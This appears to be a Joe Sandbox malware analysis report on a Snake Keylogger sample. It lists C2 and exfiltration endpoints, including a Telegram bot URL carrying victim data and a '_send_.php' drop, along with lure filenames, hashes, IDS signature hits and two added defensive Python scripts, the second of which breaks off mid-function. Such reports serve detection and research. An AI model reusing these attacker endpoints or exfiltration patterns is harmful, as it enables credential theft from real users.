Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus results (Source | Detection | Scanner | Label)
z1PO7311145.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.Snakekeylogger
z1PO7311145.exe | 100% | Avira | HEUR/AGEN.1307591
z1PO7311145.exe | 100% | Joe Sandbox ML |
                            No Antivirus matches
                            No Antivirus matches
                            No Antivirus matches
URL reputation (Source | Detection | Scanner | Label)
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://varders.kozow.com:8081 | 0% | URL Reputation | safe
http://aborters.duckdns.org:8081 | 100% | URL Reputation | malware
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
http://51.38.247.67:8081/_send_.php?L | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe
http://anotherarmy.dns.army:8081 | 100% | URL Reputation | malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://checkip.dyndns.org/q | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
Contacted domains (Name | IP | Active | Malicious | Reputation)
mail.electradubai.com | 192.250.231.25 | true | true | unknown
reallyfreegeoip.org | 188.114.97.3 | true | true | unknown
api.telegram.org | 149.154.167.220 | true | true | unknown
checkip.dyndns.com | 158.101.44.242 | true | false | unknown
checkip.dyndns.org | unknown | unknown | true | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:27:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
URLs found in memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation)
https://www.office.com/ | z1PO7311145.exe, 00000000.00000002.3696383781.0000000003086000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003077000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/chrome_newtab | z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot | z1PO7311145.exe | false | | unknown
https://www.office.com/lB | z1PO7311145.exe, 00000000.00000002.3696383781.0000000003081000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.office.com/xK | z1PO7311145.exe, 00000000.00000002.3696383781.0000000003077000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://checkip.dyndns.org | z1PO7311145.exe, 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://chrome.google.com/webstore?hl=en | z1PO7311145.exe, 00000000.00000002.3696383781.0000000003055000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003046000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://varders.kozow.com:8081 | z1PO7311145.exe | false | URL Reputation: safe | unknown
http://aborters.duckdns.org:8081 | z1PO7311145.exe | true | URL Reputation: malware | unknown
https://ac.ecosia.org/autocomplete?q= | z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?L | z1PO7311145.exe, 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://anotherarmy.dns.army:8081 | z1PO7311145.exe | true | URL Reputation: malware | unknown
https://chrome.google.com/webstore?hl=enxK | z1PO7311145.exe, 00000000.00000002.3696383781.0000000003046000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20a | z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/q | z1PO7311145.exe | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=enlB | z1PO7311145.exe, 00000000.00000002.3696383781.0000000003050000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://reallyfreegeoip.org | z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.electradubai.com | z1PO7311145.exe, 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.00000000030C1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | z1PO7311145.exe, 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | z1PO7311145.exe | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/ | z1PO7311145.exe | false | URL Reputation: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAM (RU) | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENET (US) | true
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898 (US) | false
192.250.231.25 | mail.electradubai.com | United States | 36454 | CNSV-LLC (US) | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528088
Start date and time: 2024-10-07 15:31:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: z1PO7311145.exe
Detection: MAL
Classification: mal100.troj.spyw.winEXE@1/0@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 74
• Number of non-executed functions: 32
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: z1PO7311145.exe
Analysis events (Time | Type | Description)
09:32:10 | API Interceptor | 12792314x Sleep call for process: z1PO7311145.exe modified
Other samples seen contacting the same IPs (Match | Associated Sample Name / URL | Detection | Threat Name | Context)

149.154.167.220:
PO.doc | malicious | Snake Keylogger, VIP Keylogger
TEKLİF TALEP VE FİYAT TEKLİFİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger
rREQUESTFORQUOTE-INQUIRY87278.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger
SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe | malicious | GuLoader, Snake Keylogger
Yeni Sipariş.pdf.exe | malicious | AgentTesla
COMPANY PROFILE_pdf.exe | malicious | DarkTortilla, Snake Keylogger
Plaćanje,jpg.exe | malicious | Snake Keylogger, VIP Keylogger
Quotation.exe | malicious | Snake Keylogger, VIP Keylogger
sam.exe | malicious | MassLogger RAT, PureLog Stealer
ENQUIRY NEED QUOTATION.exe | malicious | Snake Keylogger, VIP Keylogger

188.114.97.3:
Arrival Notice.exe | malicious | FormBook | www.cc101.pro/0r21/
http://www.thegulfthermale.com.tr/antai/12/3dsec.php | malicious | Unknown | www.thegulfthermale.com.tr/antai/12/3dsec.php
QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/eZFzMENr/download
QUOTATION_OCTQTRA071244úPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/MlZtCPkK/download
https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2 | malicious | HTMLPhisher | mairie-espondeilhan.com/
QUOTATION_SEPQTRA071244úPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/758bYd86/download
QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/58PSl7si/download
QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/58PSl7si/download
payment copy.exe | malicious | FormBook | www.cc101.pro/0r21/
BX7yRz7XqF.lnk | malicious | PureLog Stealer, zgRAT | cloud.dellicon.top/1000/500/

158.101.44.242:
PO.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
은행_상세정보.exe | malicious | Snake Keylogger | checkip.dyndns.org/
sam.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
QUOTATION_OCTQTRA071244úPDF.scr.exe | malicious | Snake Keylogger | checkip.dyndns.org/
MT103-93850.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
StatementXofXaccount.docx.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
z1PurchaseOrder.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
MT Eagle Asia 1.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
KBGC_1200O000000_98756.docx.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
Updated New Order.xls | malicious | Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org
checkip.dyndns.com
mail.electradubai.com
api.telegram.org
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU
CLOUDFLARENETUS
CNSV-LLCUS
ORACLE-BMC-31898US
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
54328bd36c14bd82ddaa0c04b25ed9ad
3b5074b1b5d032e5620f69f9f700ff0e
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.630776175113395
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.79%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Win16/32 Executable Delphi generic (2074/23) 0.01%
File name: z1PO7311145.exe
File size: 276'992 bytes
MD5: b9a13749cc0659a2076afca8f7474509
SHA1: 4cb32e56f1333ee8eb523c442d597bad0faf49b7
SHA256: c8f7435398a1f1de11e2b2385b2bfd92414860fe7394071ba329ad0ee1c22a48
SHA512: 0377a1150581be8a39b17dc7a075d7ae11ee43f54b6dffec032548ada39cf704ca4dd883ca46557a4cb674ee023559d90abb0cf0b4fde702590223d612675553
SSDEEP: 3072:8WAT5ctg+Orw0aqqb5mlXYOE6jc7dz0pHuHA7sfMobfD4lD7soAUYTVg4iIbbY:v6ySsfMobr4lDG7b
TLSH: 914484092FE8A801D6FF8877C2B65125C6BAF06306698D3E16D1F81A3E3D541DE46F63
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............P..$...........C... ...`....@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x44432e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x669085D9 [Fri Jul 12 01:24:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x442d4          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x46000          0x1017        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x48000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x42334       0x42400   919e43dbe19599951b7418f92397e789  False     0.2138892983490566  data       5.632473442443166    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x46000          0x1017        0x1200    78b97a769c57cf460625c961b04b1a16  False     0.3543836805555556  data       4.76801789588623     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x48000          0xc           0x200     3357292ff3dc4e25505da1bb6c6902f0  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                                Language  Country  ZLIB Complexity
RT_VERSION   0x460a0  0x31c  data                                                                                                   0.4271356783919598
RT_MANIFEST  0x463bc  0xc5b  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                      0.3926651912741069
DLL          Import
mscoree.dll  _CorExeMain

A native import table that consists only of mscoree.dll!_CorExeMain, together with a non-zero IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR entry (RVA 0x2008, size 0x48, the CLR header), identifies the file as a .NET assembly. The native entry point is only the stub that hands control to the CLR, so the x86 disassembly above is not the sample's logic; the managed code (CIL) in .text is what has to be decompiled.
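As an added example (not Joe Sandbox code and not taken from the sample), the script below parses the same PE fields the tables above report: the data directory table, the section headers with per-section entropy, and the COM descriptor entry that marks a managed image. It runs on a constructed PE32 image built by build_sample_pe(), whose layout copies the report's numbers (.text at 0x2000, IAT at 0x2000, CLR header at 0x2008); the helper names and that test image are this example's own.

```python
"""PE header walker for triage: data directories, section table, entropy.

Added example for this report, not Joe Sandbox code. It parses the fields
the report tabulates above (IMAGE_DIRECTORY_ENTRY_*, section headers, per
section entropy) and flags a managed (.NET) image via the COM descriptor
directory. The image it runs on is a constructed PE32 stub built in
build_sample_pe(), not the analysed sample; offsets follow the PE/COFF spec.
"""
import math
import struct

DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant run, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes) -> dict:
    """Walk DOS -> PE -> COFF -> PE32 optional header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20                                    # optional header
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) optional headers are handled")
    num_rva = struct.unpack_from("<I", image, opt + 92)[0]
    dirs = {}
    for i in range(min(num_rva, 16)):                  # directory table at +96
        rva, size = struct.unpack_from("<II", image, opt + 96 + 8 * i)
        dirs[DIRECTORY_NAMES[i]] = (rva, size)
    sections = []
    table = opt + opt_size                             # 40-byte section headers
    for i in range(num_sections):
        hdr = image[table + 40 * i:table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", hdr, 8)
        chars = struct.unpack_from("<I", hdr, 36)[0]
        sections.append({
            "name": name, "va": vaddr, "vsize": vsize, "rawsize": rawsize,
            "entropy": shannon_entropy(image[rawptr:rawptr + rawsize]),
            "executable": bool(chars & 0x20000000),   # IMAGE_SCN_MEM_EXECUTE
        })
    rva, size = dirs.get("COM_DESCRIPTOR", (0, 0))
    return {"directories": dirs, "sections": sections,
            "is_dotnet": rva != 0 and size != 0}


def build_sample_pe() -> bytes:
    """Constructed test image (not the sample): one .text section laid out like
    the report's (VA 0x2000, IAT at 0x2000, CLR header at 0x2008)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, 1 section
    opt = bytearray(224)                                             # PE32 + 16 dirs
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 12, 0x2000, 0x8)           # IAT
    struct.pack_into("<II", opt, 96 + 8 * 14, 0x2008, 0x48)          # COM_DESCRIPTOR
    raw_ptr, text = 0x200, bytes(range(256)) * 2                     # max-entropy body
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x2000,
                          len(text), raw_ptr, 0, 0, 0, 0, 0x60000020)
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section
    return image + b"\0" * (raw_ptr - len(image)) + text


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print("managed (.NET) image:", info["is_dotnet"])
    for name, (rva, size) in info["directories"].items():
        if size:
            print(f"  IMAGE_DIRECTORY_ENTRY_{name:<15} rva=0x{rva:x} size=0x{size:x}")
    for s in info["sections"]:
        print(f"  {s['name']:<8} va=0x{s['va']:x} raw=0x{s['rawsize']:x} "
              f"entropy={s['entropy']:.3f} exec={s['executable']}")
```

Run it against a real file with parse_pe(open(path, "rb").read()). The per-section entropy the report lists (5.63 for .text, 0.10 for the 12-byte .reloc) is the same kind of Shannon measure over the raw section bytes. A 64-bit (PE32+) image keeps its directory table at offset 112 of the optional header instead of 96; the parser refuses those rather than reading the wrong field.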
Timestamp                        SID      Signature                                           Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-10-07T15:32:10.619499+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH   2         192.168.2.7  49699        158.101.44.242  80         TCP
2024-10-07T15:32:11.463421+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH   2         192.168.2.7  49699        158.101.44.242  80         TCP
2024-10-07T15:32:12.024708+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H    3         192.168.2.7  49701        188.114.97.3    443        TCP
2024-10-07T15:32:12.635105+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH   2         192.168.2.7  49702        158.101.44.242  80         TCP
2024-10-07T15:32:13.791372+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH   2         192.168.2.7  49704        158.101.44.242  80         TCP
2024-10-07T15:32:14.947634+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH   2         192.168.2.7  49706        158.101.44.242  80         TCP
2024-10-07T15:32:15.878264+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H    3         192.168.2.7  49707        188.114.97.3    443        TCP
2024-10-07T15:32:17.084831+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H    3         192.168.2.7  49709        188.114.97.3    443        TCP
2024-10-07T15:32:18.238750+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H    3         192.168.2.7  49711        188.114.97.3    443        TCP
2024-10-07T15:32:19.662001+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H    3         192.168.2.7  49713        188.114.97.3    443        TCP
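As an added example (not part of the Joe Sandbox report), the script below pulls the connection starts out of the TCP packet listing that follows and scores how regular they are per server endpoint. The rows embedded in it are copied from that listing; the flow-reconstruction rule, the median/MAD statistic and its thresholds are this example's own choices, and the report itself makes no claim about beaconing or periodicity.

```python
"""Connection-start periodicity check over the report's TCP packet rows.

Added example, not part of the Joe Sandbox report. SAMPLE_ROWS is copied
from the TCP packet table in this report (analysis host 192.168.2.7 talking
to 158.101.44.242:80 and 188.114.97.3:443); the periodicity test and its
thresholds are this example's own choice, not anything the report asserts.
Each flow's first packet is taken as its connection start, starts are grouped
per server endpoint, and the gaps between successive starts are scored with a
median / median-absolute-deviation ratio so that one slow first request does
not mask an otherwise tight loop.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Rows from the report's packet listing, two or more spaces between columns:
# timestamp, source port, dest port, source IP, dest IP.
SAMPLE_ROWS = """
Oct 7, 2024 15:32:08.776802063 CEST  49699  80     192.168.2.7     158.101.44.242
Oct 7, 2024 15:32:08.781671047 CEST  80     49699  158.101.44.242  192.168.2.7
Oct 7, 2024 15:32:10.419852018 CEST  49699  80     192.168.2.7     158.101.44.242
Oct 7, 2024 15:32:10.619436979 CEST  49700  443    192.168.2.7     188.114.97.3
Oct 7, 2024 15:32:10.619488955 CEST  443    49700  188.114.97.3    192.168.2.7
Oct 7, 2024 15:32:11.420046091 CEST  49701  443    192.168.2.7     188.114.97.3
Oct 7, 2024 15:32:12.031086922 CEST  49702  80     192.168.2.7     158.101.44.242
Oct 7, 2024 15:32:12.586659908 CEST  49703  443    192.168.2.7     188.114.97.3
Oct 7, 2024 15:32:13.185630083 CEST  49704  80     192.168.2.7     158.101.44.242
Oct 7, 2024 15:32:13.740792036 CEST  49705  443    192.168.2.7     188.114.97.3
Oct 7, 2024 15:32:14.330506086 CEST  49706  80     192.168.2.7     158.101.44.242
Oct 7, 2024 15:32:14.897156954 CEST  49707  443    192.168.2.7     188.114.97.3
Oct 7, 2024 15:32:15.897013903 CEST  49708  80     192.168.2.7     158.101.44.242
Oct 7, 2024 15:32:16.485485077 CEST  49709  443    192.168.2.7     188.114.97.3
Oct 7, 2024 15:32:17.090563059 CEST  49710  80     192.168.2.7     158.101.44.242
""".strip().splitlines()


def parse_timestamp(text: str) -> float:
    """'Oct 7, 2024 15:32:08.776802063 CEST' -> seconds. The zone name is
    ignored: every row of one capture shares it and only differences matter."""
    date_part, time_part, _zone = text.rsplit(" ", 2)
    hms, frac = time_part.split(".")
    base = datetime.strptime(f"{date_part} {hms}", "%b %d, %Y %H:%M:%S")
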